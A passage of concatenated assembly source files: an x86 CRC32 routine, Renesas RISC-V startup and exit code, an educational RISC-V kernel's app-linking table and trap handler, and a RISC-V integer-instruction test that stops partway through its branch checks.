* we can compare for equality to determine when to exit the loop.
*/
addl %esi, %edi
subl $8, %edi
/* Read in the first eight aligned bytes. */
xorl (%esi), %eax
movl 4(%esi), %ecx
movzbl %cl, %ebp
.L_loop:
movl 0x0C00(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl 0x0800(%ebx, %ebp, 4), %edx
shrl $16, %ecx
xorl 8(%esi), %edx
movzbl %cl, %ebp
xorl 0x0400(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl (%ebx, %ebp, 4), %edx
movzbl %al, %ebp
/*
* Read the next four bytes, for which the CRC is calculated
* on the next iteration of the loop.
*/
movl 12(%esi), %ecx
xorl 0x1C00(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
shrl $16, %eax
xorl 0x1800(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
movzbl %al, %eax
movl 0x1400(%ebx, %eax, 4), %eax
addl $8, %esi
xorl %edx, %eax
xorl 0x1000(%ebx, %ebp, 4), %eax
/* Check for end of aligned input. */
cmpl %edi, %esi
movzbl %cl, %ebp
jne .L_loop
/*
* Process the remaining eight bytes, which we have already
* copied to %ecx and %edx.
*/
movl 0x0C00(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl 0x0800(%ebx, %ebp, 4), %edx
shrl $16, %ecx
movzbl %cl, %ebp
xorl 0x0400(%ebx, %ebp, 4), %edx
movzbl %ch, %ebp
xorl (%ebx, %ebp, 4), %edx
movzbl %al, %ebp
xorl 0x1C00(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
shrl $16, %eax
xorl 0x1800(%ebx, %ebp, 4), %edx
movzbl %ah, %ebp
movzbl %al, %eax
movl 0x1400(%ebx, %eax, 4), %eax
addl $8, %esi
xorl %edx, %eax
xorl 0x1000(%ebx, %ebp, 4), %eax
/* Copy the number of remaining bytes to %edi. */
movl 0x18(%esp), %edi
.L_rest:
/* Check for end of input. */
testl %edi, %edi
jz .L_return
/* Calculate CRC of the next input byte. */
movzbl (%esi), %ebp
incl %esi
movzbl %al, %ecx
xorl %ecx, %ebp
shrl $8, %eax
xorl (%ebx, %ebp, 4), %eax
decl %edi
jmp .L_rest
.L_return:
/* Complement the final value. */
notl %eax
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
#if defined(PIC) || defined(__PIC__)
ALIGN(4, 16)
.L_get_pc:
movl (%esp), %ebx
ret
#endif
#if defined(__APPLE__) && (defined(PIC) || defined(__PIC__))
/* Mach-O PIC */
.section __IMPORT,__pointers,non_lazy_symbol_pointers
.L_lzma_crc32_table$non_lazy_ptr:
.indirect_symbol LZMA_CRC32_TABLE
.long 0
#elif defined(_WIN32) || defined(__CYGWIN__)
# ifdef DLL_EXPORT
/* This is the equivalent of __declspec(dllexport). */
.section .drectve
.ascii " -export:lzma_crc32"
# endif
#elif !defined(__MSDOS__)
/* ELF */
.size LZMA_CRC32, .-LZMA_CRC32
#endif
/*
* This is needed to support non-executable stack. It's ugly to
* use __linux__ here, but I don't know a way to detect when
* we are using GNU assembler.
*/
#if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",@progbits
#endif
|
MikelB03/TFM_Mikel_Barrena | 4,085 | RISC-V/R9A02G021_c/src/smc_gen/r_bsp/mcu/all/start.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : start.S
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;; : 29.03.2024 1.10 Add code to init the data segment for ECC
;;***********************************************************************************************************************/
/*reset_program.asm*/
.extern initialize_vect
.text
.global _PowerON_Reset /*! global Start routine */
.type _PowerON_Reset, @function
/* call to _PowerON_Reset */
_PowerON_Reset:
# Initialize global pointer
.option push
.option norelax
1:
auipc gp, %pcrel_hi(__global_pointer$)
addi gp, gp, %pcrel_lo(1b)
.option pop
# initialize the stack and frame pointers
la sp, __stack
add s0, sp, zero
# Initialize vect
call initialize_vect
# Call bsp_init_system() function - clock setup
call bsp_init_system
# Clear the bss segment
la a0, __bss
la a2, __ebss
sub a2, a2, a0
li a1, 0
call memset
# Init the data segment
la a0, __datastart
la a1, __romdatastart
la a2, __romdatacopysize
call memcpy
# Init the data segment for ECC
la a0, __dataeccramstart
la a1, __romdataeccramstart
la a2, __romdataeccramcopysize
call memcpy
# Call bsp_init_hardware() function - hardware setup
call bsp_init_hardware
# Make reference to atexit weak to avoid unconditionally pulling in
# support code. Refer to comments in __atexit.c for more details.
.weak atexit
la a0, atexit
beqz a0, .Lweak_atexit
.weak __libc_fini_array
la a0, __libc_fini_array # Register global termination functions
call atexit # to be called upon exit
.Lweak_atexit:
call __libc_init_array # Run global initialization functions
li a0, 0 # a0 = argc
li a1, 0 # a1 = argv
li a2, 0 # a2 = envp = NULL
call main
tail exit
.size _PowerON_Reset, .-_PowerON_Reset
|
MikelB03/TFM_Mikel_Barrena | 2,545 | RISC-V/R9A02G021_c/src/smc_gen/r_bsp/mcu/all/r_bsp_common_llvm.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : r_bsp_common_llvm.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.globl _delay_wait /*! global delay wait routine */
;;/****************************************************************************
;;* delay_wait
;;****************************************************************************/
_delay_wait:
loop:
addi a0, a0, -1
bnez a0, loop
_exit:
ret
|
MikelB03/TFM_Mikel_Barrena | 2,451 | RISC-V/R9A02G021_c/src/smc_gen/r_bsp/mcu/all/exit.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : exit.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.global _exit
.type _exit, @function
_exit:
# exit with the return code on the qemu virt machine
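# The arithmetic below builds (a0 << 16) | 0x3333 in a0 and stores it
# to address 0x00100000 (a0 << 12, plus 0x333, shifted left four more,
# plus 3). That address and the 0x3333 low half match QEMU's
# sifive_test finisher device on the virt machine, which terminates
# QEMU with the exit status taken from the upper 16 bits.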
lui t0, 0x100
slli a0, a0, 12
addi a0, a0, 0x333
slli a0, a0, 4
addi a0, a0, 0x3
sw a0, 0(t0)
|
MikelB03/TFM_Mikel_Barrena | 4,085 | RISC-V/R9A02G021_fromScilab/src/smc_gen/r_bsp/mcu/all/start.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : start.S
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;; : 29.03.2024 1.10 Add code to init the data segment for ECC
;;***********************************************************************************************************************/
/*reset_program.asm*/
.extern initialize_vect
.text
.global _PowerON_Reset /*! global Start routine */
.type _PowerON_Reset, @function
/* call to _PowerON_Reset */
_PowerON_Reset:
# Initialize global pointer
.option push
.option norelax
1:
auipc gp, %pcrel_hi(__global_pointer$)
addi gp, gp, %pcrel_lo(1b)
.option pop
# initialize the stack and frame pointers
la sp, __stack
add s0, sp, zero
# Initialize vect
call initialize_vect
# Call bsp_init_system() function - clock setup
call bsp_init_system
# Clear the bss segment
la a0, __bss
la a2, __ebss
sub a2, a2, a0
li a1, 0
call memset
# Init the data segment
la a0, __datastart
la a1, __romdatastart
la a2, __romdatacopysize
call memcpy
# Init the data segment for ECC
la a0, __dataeccramstart
la a1, __romdataeccramstart
la a2, __romdataeccramcopysize
call memcpy
# Call bsp_init_hardware() function - hardware setup
call bsp_init_hardware
# Make reference to atexit weak to avoid unconditionally pulling in
# support code. Refer to comments in __atexit.c for more details.
.weak atexit
la a0, atexit
beqz a0, .Lweak_atexit
.weak __libc_fini_array
la a0, __libc_fini_array # Register global termination functions
call atexit # to be called upon exit
.Lweak_atexit:
call __libc_init_array # Run global initialization functions
li a0, 0 # a0 = argc
li a1, 0 # a1 = argv
li a2, 0 # a2 = envp = NULL
call main
tail exit
.size _PowerON_Reset, .-_PowerON_Reset
|
MikelB03/TFM_Mikel_Barrena | 2,545 | RISC-V/R9A02G021_fromScilab/src/smc_gen/r_bsp/mcu/all/r_bsp_common_llvm.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : r_bsp_common_llvm.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.globl _delay_wait /*! global delay wait routine */
;;/****************************************************************************
;;* delay_wait
;;****************************************************************************/
_delay_wait:
loop:
addi a0, a0, -1
bnez a0, loop
_exit:
ret
|
MikelB03/TFM_Mikel_Barrena | 2,451 | RISC-V/R9A02G021_fromScilab/src/smc_gen/r_bsp/mcu/all/exit.s | ;;/***********************************************************************************************************************
;;* DISCLAIMER
;;* This software is supplied by Renesas Electronics Corporation and is only intended for use with Renesas products. No
;;* other uses are authorized. This software is owned by Renesas Electronics Corporation and is protected under all
;;* applicable laws, including copyright laws.
;;* THIS SOFTWARE IS PROVIDED "AS IS" AND RENESAS MAKES NO WARRANTIES REGARDING
;;* THIS SOFTWARE, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY,
;;* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. ALL SUCH WARRANTIES ARE EXPRESSLY DISCLAIMED. TO THE MAXIMUM
;;* EXTENT PERMITTED NOT PROHIBITED BY LAW, NEITHER RENESAS ELECTRONICS CORPORATION NOR ANY OF ITS AFFILIATED COMPANIES
;;* SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES FOR ANY REASON RELATED TO THIS
;;* SOFTWARE, EVEN IF RENESAS OR ITS AFFILIATES HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
;;* Renesas reserves the right, without notice, to make changes to this software and to discontinue the availability of
;;* this software. By using this software, you agree to the additional terms and conditions found by accessing the
;;* following link:
;;* http://www.renesas.com/disclaimer
;;*
;;* Copyright (C) 2024 Renesas Electronics Corporation. All rights reserved.
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* File Name : exit.s
;;* Description :
;;***********************************************************************************************************************/
;;/***********************************************************************************************************************
;;* History : DD.MM.YYYY Version Description
;;* : 20.01.2024 1.00 First Release
;;***********************************************************************************************************************/
.global _exit
.type _exit, @function
_exit:
# exit with the return code on the qemu virt machine
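# The arithmetic below builds (a0 << 16) | 0x3333 in a0 and stores it
# to address 0x00100000 (a0 << 12, plus 0x333, shifted left four more,
# plus 3). That address and the 0x3333 low half match QEMU's
# sifive_test finisher device on the virt machine, which terminates
# QEMU with the exit status taken from the upper 16 bits.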
lui t0, 0x100
slli a0, a0, 12
addi a0, a0, 0x333
slli a0, a0, 4
addi a0, a0, 0x3
sw a0, 0(t0)
|
mikotopku/os | 4,414 | src/link_app.S |
.align 3
.section .data
.global _num_app
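# Table layout: one quad holding the app count (19), followed by the
# start address of each app image and finally app_18_end, so app i's
# image occupies [entry[i + 1], entry[i + 2]) of this table.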
_num_app:
.quad 19
.quad app_0_start
.quad app_1_start
.quad app_2_start
.quad app_3_start
.quad app_4_start
.quad app_5_start
.quad app_6_start
.quad app_7_start
.quad app_8_start
.quad app_9_start
.quad app_10_start
.quad app_11_start
.quad app_12_start
.quad app_13_start
.quad app_14_start
.quad app_15_start
.quad app_16_start
.quad app_17_start
.quad app_18_start
.quad app_18_end
.global _app_names
_app_names:
.string "exit"
.string "forkexec"
.string "forktest"
.string "forktest2"
.string "forktest_simple"
.string "forktree"
.string "hello_world"
.string "initproc"
.string "matrix"
.string "mem"
.string "sleep"
.string "sleep_simple"
.string "spawntest"
.string "stack_overflow"
.string "stridetest"
.string "user_shell"
.string "usertests"
.string "usertests-simple"
.string "yield"
.section .data
.global app_0_start
.global app_0_end
.align 3
app_0_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/exit"
app_0_end:
.section .data
.global app_1_start
.global app_1_end
.align 3
app_1_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forkexec"
app_1_end:
.section .data
.global app_2_start
.global app_2_end
.align 3
app_2_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktest"
app_2_end:
.section .data
.global app_3_start
.global app_3_end
.align 3
app_3_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktest2"
app_3_end:
.section .data
.global app_4_start
.global app_4_end
.align 3
app_4_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktest_simple"
app_4_end:
.section .data
.global app_5_start
.global app_5_end
.align 3
app_5_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktree"
app_5_end:
.section .data
.global app_6_start
.global app_6_end
.align 3
app_6_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/hello_world"
app_6_end:
.section .data
.global app_7_start
.global app_7_end
.align 3
app_7_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/initproc"
app_7_end:
.section .data
.global app_8_start
.global app_8_end
.align 3
app_8_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/matrix"
app_8_end:
.section .data
.global app_9_start
.global app_9_end
.align 3
app_9_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/mem"
app_9_end:
.section .data
.global app_10_start
.global app_10_end
.align 3
app_10_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/sleep"
app_10_end:
.section .data
.global app_11_start
.global app_11_end
.align 3
app_11_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/sleep_simple"
app_11_end:
.section .data
.global app_12_start
.global app_12_end
.align 3
app_12_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/spawntest"
app_12_end:
.section .data
.global app_13_start
.global app_13_end
.align 3
app_13_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/stack_overflow"
app_13_end:
.section .data
.global app_14_start
.global app_14_end
.align 3
app_14_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/stridetest"
app_14_end:
.section .data
.global app_15_start
.global app_15_end
.align 3
app_15_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/user_shell"
app_15_end:
.section .data
.global app_16_start
.global app_16_end
.align 3
app_16_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/usertests"
app_16_end:
.section .data
.global app_17_start
.global app_17_end
.align 3
app_17_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/usertests-simple"
app_17_end:
.section .data
.global app_18_start
.global app_18_end
.align 3
app_18_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/yield"
app_18_end:
|
mikotopku/os | 1,640 | src/trap/trap.S | .altmacro
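# .altmacro enables the alternate macro syntax needed for the "%n"
# argument evaluation used when SAVE_GP/LOAD_GP are expanded inside
# the .rept loops below.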
.macro SAVE_GP n
sd x\n, \n*8(sp)
.endm
.macro LOAD_GP n
ld x\n, \n*8(sp)
.endm
.section .text.trampoline
.globl __alltraps
.globl __restore
.align 2
__alltraps:
csrrw sp, sscratch, sp
# now sp->*TrapContext in user space, sscratch->user stack
# save other general purpose registers
sd x1, 1*8(sp)
# skip sp(x2), we will save it later
sd x3, 3*8(sp)
# skip tp(x4), application does not use it
# save x5~x31
.set n, 5
.rept 27
SAVE_GP %n
.set n, n+1
.endr
# we can use t0/t1/t2 freely, because they have been saved in TrapContext
csrr t0, sstatus
csrr t1, sepc
sd t0, 32*8(sp)
sd t1, 33*8(sp)
# read user stack from sscratch and save it in TrapContext
csrr t2, sscratch
sd t2, 2*8(sp)
# load kernel_satp into t0
ld t0, 34*8(sp)
# load trap_handler into t1
ld t1, 36*8(sp)
# move to kernel_sp
ld sp, 35*8(sp)
# switch to kernel space
csrw satp, t0
sfence.vma
# jump to trap_handler
jr t1
__restore:
# a0: *TrapContext in user space(Constant); a1: user space token
# switch to user space
csrw satp, a1
sfence.vma
csrw sscratch, a0
mv sp, a0
# now sp points to TrapContext in user space, start restoring based on it
# restore sstatus/sepc
ld t0, 32*8(sp)
ld t1, 33*8(sp)
csrw sstatus, t0
csrw sepc, t1
# restore general purpose registers except x0/sp/tp
ld x1, 1*8(sp)
ld x3, 3*8(sp)
.set n, 5
.rept 27
LOAD_GP %n
.set n, n+1
.endr
# back to user stack
ld sp, 2*8(sp)
sret
|
minhcly95/riscv_sim | 7,563 | asm/src/int_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# ---------------- OP-IMM -----------------
# ADDI
addi x3, x1, 0xfffff89b # Should be 0xbcfec0cd
sw x3, 0(x31)
addi x3, x2, 0x3b2 # Should be 0x51291095
sw x3, 4(x31)
# XORI
xori x3, x1, 0xfffff89b # Should be 0x430130a9
sw x3, 8(x31)
xori x3, x2, 0x3b2 # Should be 0x51290f51
sw x3, 12(x31)
# ORI
ori x3, x1, 0xfffff89b # Should be 0xfffff8bb
sw x3, 16(x31)
ori x3, x2, 0x3b2 # Should be 0x51290ff3
sw x3, 20(x31)
# ANDI
andi x3, x1, 0xfffff89b # Should be 0xbcfec812
sw x3, 24(x31)
andi x3, x2, 0x3b2 # Should be 0x000000a2
sw x3, 28(x31)
# SLTI
slti x3, x1, 0xfffff89b # Should be 0x00000001
sw x3, 32(x31)
slti x3, x1, 0x3b2 # Should be 0x00000001
sw x3, 36(x31)
slti x3, x2, 0xfffff89b # Should be 0x00000000
sw x3, 40(x31)
slti x3, x2, 0x3b2 # Should be 0x00000000
sw x3, 44(x31)
# SLTIU
sltiu x3, x1, 0xfffff89b # Should be 0x00000001
sw x3, 48(x31)
sltiu x3, x1, 0x3b2 # Should be 0x00000000
sw x3, 52(x31)
sltiu x3, x2, 0xfffff89b # Should be 0x00000001
sw x3, 56(x31)
sltiu x3, x2, 0x3b2 # Should be 0x00000000
sw x3, 60(x31)
# SLLI
slli x3, x1, 11 # Should be 0xf6419000
sw x3, 64(x31)
slli x3, x2, 2 # Should be 0x44a4338c
sw x3, 68(x31)
# SRLI
srli x3, x1, 11 # Should be 0x00179fd9
sw x3, 72(x31)
srli x3, x2, 2 # Should be 0x144a4338
sw x3, 76(x31)
# SRAI
srai x3, x1, 11 # Should be 0xfff79fd9
sw x3, 80(x31)
srai x3, x2, 2 # Should be 0x144a4338
sw x3, 84(x31)
# ------------------ OP -------------------
# ADD
add x4, x1, x2 # Should be 0x0e27d515
sw x4, 88(x31)
# SUB
sub x3, x1, x2 # Should be 0x6bd5bb4f
sw x3, 92(x31)
sub x3, x2, x1 # Should be 0x942a44b1
sw x3, 96(x31)
# XOR
xor x3, x1, x2 # Should be 0xedd7c4d1
sw x3, 100(x31)
# OR
or x3, x1, x2 # Should be 0xfdffccf3
sw x3, 104(x31)
# AND
and x3, x1, x2 # Should be 0x10280822
sw x3, 108(x31)
# SLT
slt x3, x1, x2 # Should be 0x00000001
sw x3, 112(x31)
slt x3, x2, x1 # Should be 0x00000000
sw x3, 116(x31)
slt x3, x1, x1 # Should be 0x00000000
sw x3, 120(x31)
slt x3, x2, x2 # Should be 0x00000000
sw x3, 124(x31)
# SLTU
sltu x3, x1, x2 # Should be 0x00000000
sw x3, 128(x31)
sltu x3, x2, x1 # Should be 0x00000001
sw x3, 132(x31)
# SLL
sll x3, x1, x2 # Should be 0xe7f64190
sw x3, 136(x31)
sll x3, x2, x1 # Should be 0x338c0000
sw x3, 140(x31)
# SRL
srl x3, x1, x2 # Should be 0x179fd906
sw x3, 144(x31)
srl x3, x2, x1 # Should be 0x0000144a
sw x3, 148(x31)
# SRA
sra x3, x1, x2 # Should be 0xf79fd906
sw x3, 152(x31)
sra x3, x2, x1 # Should be 0x0000144a
sw x3, 156(x31)
# -------------- LUI / AUIPC --------------
# LUI
lui x3, 0xc42bd # Should be 0xc42bd000
sw x3, 160(x31)
lui x3, 0x97bd2 # Should be 0x97bd2000
sw x3, 164(x31)
# AUIPC (PC is 0x164)
auipc x3, 0xc42bd # Should be 0xc42bd164
sw x3, 168(x31)
auipc x3, 0x97bd2 # Should be 0x97bd216c
sw x3, 172(x31)
# ------------- LOAD / STORE --------------
# SB (x3 should be 0x97bd216c, x4 should be 0x0e27d515)
sb x1, 176(x31)
sb x2, 177(x31)
sb x3, 178(x31)
sb x4, 179(x31) # Should be 0x156ce332
# SH
sh x1, 180(x31)
sh x2, 182(x31) # Should be 0x0ce3c832
sh x3, 184(x31)
sh x4, 186(x31) # Should be 0xd515216c
# LB
lb x3, 176(x31) # Should be 0x00000032
sw x3, 188(x31)
lb x3, 177(x31) # Should be 0xffffffe3
sw x3, 192(x31)
# LBU
lbu x3, 176(x31) # Should be 0x00000032
sw x3, 196(x31)
lbu x3, 177(x31) # Should be 0x000000e3
sw x3, 200(x31)
# LH
lh x3, 180(x31) # Should be 0xffffc832
sw x3, 204(x31)
lh x3, 182(x31) # Should be 0x00000ce3
sw x3, 208(x31)
# LHU
lhu x3, 184(x31) # Should be 0x0000216c
sw x3, 212(x31)
lhu x3, 186(x31) # Should be 0x0000d515
sw x3, 216(x31)
# ----------------- JUMP ------------------
# JAL
li x3, 0x10
sw x3, 220(x31)
jal x4, jal_target
sb x1, 221(x31) # Should skip
jal_target:
sb x1, 222(x31) # Should be 0x00320010
sw x4, 224(x31) # Should be 0x000001e0
# JALR
li x3, 0x11
sw x3, 228(x31)
auipc x4, 0
jalr x5, 13(x4) # Test if the LSB is ignored
sb x2, 229(x31) # Should skip
jalr_target:
sb x2, 230(x31) # Should be 0x00e30011
sw x5, 232(x31) # Should be 0x000001fc
# ---------------- BRANCH -----------------
# BEQ
li x3, 0x12
sw x3, 236(x31)
mv x4, x1
beq x1, x2, beq1
sb x1, 237(x31) # Should take
beq1:
beq x2, x1, beq2
sb x1, 238(x31) # Should take
beq2:
beq x1, x4, beq3
sb x1, 239(x31) # Should skip
beq3: # Should be 0x00323212
# BNE
li x3, 0x13
sw x3, 240(x31)
bne x1, x2, bne1
sb x2, 241(x31) # Should skip
bne1:
bne x2, x1, bne2
sb x2, 242(x31) # Should skip
bne2:
bne x1, x4, bne3
sb x2, 243(x31) # Should take
bne3: # Should be 0xe3000013
# BLT
li x3, 0x14
sw x3, 244(x31)
blt x1, x2, blt1
sb x1, 245(x31) # Should skip
blt1:
blt x2, x1, blt2
sb x1, 246(x31) # Should take
blt2:
blt x1, x4, blt3
sb x1, 247(x31) # Should take
blt3: # Should be 0x32320014
# BGE
li x3, 0x15
sw x3, 248(x31)
bge x1, x2, bge1
